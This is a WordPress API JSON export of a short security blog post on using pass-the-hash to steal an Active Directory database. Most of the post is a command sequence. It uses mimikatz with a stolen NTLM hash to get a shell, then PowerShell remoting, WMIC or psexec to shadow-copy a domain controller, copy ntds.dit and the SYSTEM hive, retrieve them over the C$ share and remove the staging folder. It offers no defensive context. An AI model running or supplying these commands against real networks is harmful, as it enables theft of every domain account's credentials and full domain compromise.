{"id":294,"date":"2018-08-18T22:20:32","date_gmt":"2018-08-18T22:20:32","guid":{"rendered":"http:\/\/malwrforensics.com\/en\/?p=294"},"modified":"2022-01-24T07:07:07","modified_gmt":"2022-01-24T07:07:07","slug":"use-pass-the-hash-to-exfil-ntds-dit","status":"publish","type":"post","link":"https:\/\/malwrforensics.com\/en\/2018\/08\/18\/use-pass-the-hash-to-exfil-ntds-dit\/","title":{"rendered":"Use Pass-the-Hash to exfil ntds.dit"},"content":{"rendered":"

If you have a hash for either a domain admin or a local admin on a domain controller, you can use mimikatz to exfil the entire Active Directory database.<\/p>\n

From mimikatz, run the following command to spawn a shell as the target user:<\/p>\n

sekurlsa::pth \/user:<username> \/domain:<domainname> \/ntlm:<hash> \/run:cmd.exe<\/em><\/p>\n

Now you have a few options from the new cmd window. For example:<\/p>\n

Using powershell<\/strong><\/span><\/p>\n

winrm set winrm\/config\/client ‘@{TrustedHosts=”<computer_name>”}’<\/span><\/p>\n

Enter-PSSession -ComputerName <computer_name><\/span><\/p>\n

vssadmin create shadown \/for=c:<\/span><\/p>\n

mkdir c:\\1<\/span><\/p>\n

copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopyX\\windows\\ntds\\ntds.dit c:\\1<\/span><\/p>\n

reg save hklm\\system c:\\1<\/span><\/p>\n

(HarddiskVolumeShadowCopyX is the shadow copy created by vssadmin)<\/span><\/p>\n

Using wmic<\/span><\/strong><\/p>\n

WMIC \/node:”<computer_name>” process call create \u201ccmd.exe \/c vssadmin create shadown \/for=c:”<\/span><\/p>\n

WMIC \/node:”<computer_name>” process call create \u201ccmd.exe \/c mkdir c:\\1″<\/span><\/p>\n

WMIC \/node:”<computer_name>” process call create \u201ccmd.exe \/ccopy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopyX\\windows\\ntds\\ntds.dit c:\\1\u201d<\/span><\/p>\n

WMIC \/node:”<computer_name>” process call create \u201ccmd.exe \/c reg save hklm\\system c:\\1\u201d<\/span><\/p>\n

Using psexec<\/span><\/strong><\/p>\n

psexec \\\\<computer_name> vssadmin create shadow \/for=c:<\/span><\/p>\n

psexec \\\\<computer_name> cmd \/c mkdir c:\\1<\/span><\/p>\n

psexec \\\\<computer_name> cmd \/c copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopyX\\windows\\ntds\\ntds.dit c:\\1<\/span><\/p>\n

psexec\u00a0\\\\<computer_name> cmd \/c reg save hklm\\system c:\\1<\/span><\/p>\n

Access the C$ share on the remote machine, retrieve the file and delete the staging folder.<\/p>\n","protected":false},"excerpt":{"rendered":"

If you have a hash for either a domain admin or a local admin on a domain controller, you can use mimikatz to exfil the entire Active Directory database. From mimikatz, run the following command to spawn a shell as the target user: sekurlsa::pth \/user:<username> \/domain:<domainname> \/ntlm:<hash> \/run:cmd.exe Now you have a few options from […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[93,86,92,87,82,90,88,91,89],"class_list":["post-294","post","type-post","status-publish","format-standard","hentry","category-security","tag-active-directory","tag-mimikatz","tag-ntds","tag-pass-the-hash","tag-powershell","tag-psexec","tag-pth","tag-vssadmin","tag-wmic"],"blocksy_meta":{"styles_descriptor":{"styles":{"desktop":"","tablet":"","mobile":""},"google_fonts":[]}},"featured_image_urls_v2":{"full":"","thumbnail":"","medium":"","medium_large":"","large":"","1536x1536":"","2048x2048":""},"post_excerpt_stackable_v2":"

If you have a hash for either a domain admin or a local admin on a domain controller, you can use mimikatz to exfil the entire Active Directory database. From mimikatz, run the following command to spawn a shell as the target user: sekurlsa::pth \/user:<username> \/domain:<domainname> \/ntlm:<hash> \/run:cmd.exe Now you have a few options from the new cmd window. For example: Using powershell winrm set winrm\/config\/client ‘@{TrustedHosts=”<computer_name>”}’ Enter-PSSession -ComputerName <computer_name> vssadmin create shadown \/for=c: mkdir c:\\1 copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopyX\\windows\\ntds\\ntds.dit c:\\1 reg save hklm\\system c:\\1 (HarddiskVolumeShadowCopyX is the shadow copy created by vssadmin) Using wmic WMIC \/node:”<computer_name>” process call create \u201ccmd.exe \/c…<\/p>\n","category_list_v2":"Security<\/a>","author_info_v2":{"name":"malwrforensics","url":"https:\/\/malwrforensics.com\/en\/author\/u_malwrforensics\/"},"comments_num_v2":"0 comments","_links":{"self":[{"href":"https:\/\/malwrforensics.com\/en\/wp-json\/wp\/v2\/posts\/294","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/malwrforensics.com\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/malwrforensics.com\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/malwrforensics.com\/en\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/malwrforensics.com\/en\/wp-json\/wp\/v2\/comments?post=294"}],"version-history":[{"count":3,"href":"https:\/\/malwrforensics.com\/en\/wp-json\/wp\/v2\/posts\/294\/revisions"}],"predecessor-version":[{"id":794,"href":"https:\/\/malwrforensics.com\/en\/wp-json\/wp\/v2\/posts\/294\/revisions\/794"}],"wp:attachment":[{"href":"https:\/\/malwrforensics.com\/en\/wp-json\/wp\/v2\/media?parent=294"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/malwrforensics.com\/en\/wp-json\/wp\/v2\/categories?post=294"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/malwrforensics.com\/en\/wp-json\/wp\/v2\/tags?post=294"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}